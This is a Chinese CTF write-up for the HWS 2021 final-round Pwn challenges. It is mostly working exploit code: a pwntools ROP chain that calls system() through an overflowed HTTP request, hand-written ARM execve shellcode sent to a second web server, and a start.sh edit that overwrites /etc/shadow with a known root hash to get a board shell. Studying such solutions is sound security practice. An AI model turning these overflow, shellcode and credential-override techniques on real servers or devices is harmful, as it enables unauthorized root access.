HWS 2021 结营赛 Pwn

更新中…结营赛还有非常多值得探索的东西

Pwn1: easyserver

通过串口查看输出

# Exploit client for the "easyserver" challenge, written for Python 2 pwntools
# (`print payload` and the str + p32() concatenation do not run under Python 3).
from pwn import *
#context.log_level = 'debug'

# Challenge host/port on the event network; both are environment-specific.
p = remote('20.21.2.27', 59816)

# Firmware-specific, hard-coded addresses (the script assumes no ASLR/PIE on the
# target; they will not match any other build).
pop_r0_pc = 0x0006099c   # gadget: pop r0 then pc
cmd_base = 0x008ACE4     # base of where the request text is expected to sit in memory
system = 0x00019158      # system()

cmd = 'cat /tmp/207775d1ee9b9efa245fd9fb6fc03b68/flag'
# Request line carries the command string; cmd_base+13 is the pointer handed to
# system() via r0 -- why the offset is 13 is not derivable from this script, so
# confirm it against the server's buffer layout before reusing.
payload  = 'POST ./ HTTP1.1;'+cmd+'; \r\n'
# 1100 bytes of filler, then the gadget / argument / system() chain, then cyclic()
# padding and the blank lines that end the request. The 1100 figure is the
# distance to the overwritten return slot; it was found empirically and is
# not documented here.
payload += 'a'*1100+p32(pop_r0_pc)+ p32(cmd_base+13) + p32(system) +cyclic(100)+'\r\n'+'\r\n'+'\r\n'
print payload

p.send(payload)
p.interactive()

image

Pwn3: babyhttpd

通过串口查看输出

# Exploit client for the "babyhttpd" challenge (ARM target). Python 2 pwntools:
# asm() output is concatenated directly with str literals.
from pwn import *
#context.log_level = 'debug'
context(arch='arm')

# Earlier variant of the same shellcode that ran `/bin/ls /tmp`; kept for reference.
# shellcode  = asm('''
# add   r4, pc, #56
# str   r4, [sp, #8]
# sub   r2, r2, r2 
# strb  r2, [r4, #4] 

# sub   r2, r2, r2       
# add   r3, pc, #28      
# str   r3, [sp, #4]     
# str   r2, [sp, #12]     
# mov   r0, r3, lsl r2   
# strb  r2, [r3, #7]     
# add   r3, pc, #4       
# add   r1, sp, #4       
# strb  r2, [r3, #1]     
# swi   0x90ff0b         
# ''')+'/bin/ls//tmp'


# Hand-written ARM shellcode followed by the path string it operates on.
# r2 is zeroed with `sub r2, r2, r2` and then stored byte-wise (`strb r2, ...`)
# into the appended string and into the `swi` encoding itself at run time, so
# the payload as sent contains no literal null bytes (presumably because the
# HTTP parser would stop at one -- confirm). The pc-relative offsets (#60, #28,
# #4) are tied to this exact instruction sequence and string; changing either
# side requires recomputing them.
shellcode  = asm('''
add   r4, pc, #60
str   r4, [sp, #8]
sub   r2, r2, r2 
strb  r2, [r4, #25] 

sub   r2, r2, r2       
add   r3, pc, #28      
str   r3, [sp, #4]     
str   r2, [sp, #12]     
mov   r0, r3, lsl r2   
strb  r2, [r3, #8]     
add   r3, pc, #4       
add   r1, sp, #4       
strb  r2, [r3, #1]     
swi   0x90ff0b         
''')+'/bin/cat/////tmp/ffffffllllaaaaaagggg'

# Challenge host/port on the event network (environment-specific).
p = remote('20.21.2.27', 5000)

# Request line: six 0x11 filler bytes, then the shellcode and its path string,
# then the header terminator.
payload  = 'POST /'+"\x11"*6+shellcode+'\r\n\r\n'
# Body: 655 bytes of padding followed by a hard-coded, firmware-specific 32-bit
# value (0x22504) that lands on an overwritten saved slot. What that address
# points at is not shown in this script -- confirm against the binary before
# reusing. The trailing `&bbb=./;` is a second form parameter the server parses.
payload += 'name='+'a'*655+p32(0x22504)+'&bbb=./;'

p.send(payload)
p.interactive()

image

在板子上拿 shell

jffs2解包

# Install jefferson to extract JFFS2 file systems
# The `$` prefixes below are shell prompts from a transcript, not part of the
# commands; drop them to run these lines as a script.
# NOTE(review): this installs an unpinned git checkout as root via setup.py,
# which runs the repository's setup code with root privileges. Pin a specific
# commit and install into a virtualenv rather than system-wide where possible.
$ sudo pip install cstruct
$ git clone https://github.com/sviehb/jefferson
$ (cd jefferson && sudo python setup.py install)
# -M: recurse into extracted contents; -e: extract. binwalk uses jefferson for the JFFS2 parts.
binwalk -Me test.img

jffs2打包

# mkfs.jffs2 ships with mtd-utils.
sudo apt install mtd-utils
# -r: directory tree to pack; -o: output image. The flash geometry options
# (e.g. -e erase-block size, -l/-b endianness) are left at their defaults here;
# they may need to match the target device for the image to mount -- confirm.
mkfs.jffs2 -r rootfs -o rootfs.img 

修改start.sh

#!/bin/sh
# Start-script fragment for the author's own board: stage a writable copy of
# /etc under /tmp, replace the shadow file with a single root entry whose hash
# is given in the writeup, and mount the copy over /etc so that entry is used.
cp -r /etc /tmp/
# Overwrites the whole shadow file -- every other account's entry is dropped.
echo 'root:$1$NqxdI63c$nzvMkcJxzktGW6Tsgw3jb0:1::::::' > /tmp/etc/shadow
# NOTE(review): `-o loop` is meant for image files; overlaying one directory on
# another is normally `mount --bind /tmp/etc /etc`. Confirm which form the
# board's mount implementation accepts before relying on this line.
mount -o loop /tmp/etc/ /etc